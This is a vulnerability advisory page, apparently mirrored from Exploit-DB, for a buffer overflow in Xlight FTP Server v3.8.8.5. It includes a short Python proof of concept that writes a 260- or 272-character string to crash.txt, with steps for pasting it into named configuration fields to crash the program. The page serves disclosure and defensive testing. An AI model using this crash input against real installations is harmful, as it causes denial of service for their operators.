Xlight FTP Server (x86/x64) - Buffer Overflow Crash (PoC)

vendor:

Xlight FTP Server

by:

bzyo

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Xlight FTP Server

Affected Version From: v3.8.8.5 (x86/x64)

Affected Version To: v3.8.8.5 (x86/x64)

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows 7 x64

2017

Xlight FTP Server (x86/x64) – Buffer Overflow Crash (PoC)

Xlight FTP Server is vulnerable to a buffer overflow crash when a maliciously crafted string is pasted into certain fields in the application. This can be exploited by an attacker to crash the application, resulting in a denial of service.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in the application.

Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: Xlight FTP Server (x86/x64) - Buffer Overflow Crash (PoC)
# Date: 07-11-2017
# Vulnerable Software: Xlight FTP Server v3.8.8.5 (x86/x64)
# Vendor Homepage: http://www.xlightftpd.com/
# Version: v3.8.8.5 (x86/x64)
# Software Link: http://www.xlightftpd.com/download/
# Tested On: Windows 7 x64
#
#
# PoC: generate crash.txt, copy contents to clipboard, paste in any of the vulnerable fields
#
# 1. Generate crash.txt, open, and copy contents to clipboard
# 2. In Xlight Server, open Global Options > Log > Session Log - Advanced Options > Setup
# 3. Select Filtering log by users > Setup 
# 4. Add User
# 5. Paste crash.txt contents
# 6. Application crashes
#
# Additional vulnerable fields:
# Global Options > Log > Session Log - Advanced Options > Setup > Filtering log by groups > Setup > Add Group
# Virtual Server > Modify Virtual Server Configuration > Advanced > Misc > Execute a program after user logged in > Setup
#
#
  
file="crash.txt"
#file="crash64.txt"

crash = "A"*260  		#crashes on 260 for x86, but more will do
#crash64 = "A"*272		#crashes on 272 for x64, but more will do
 
writeFile = open (file, "w")
writeFile.write( crash )
#writeFile.write( crash64 )
writeFile.close()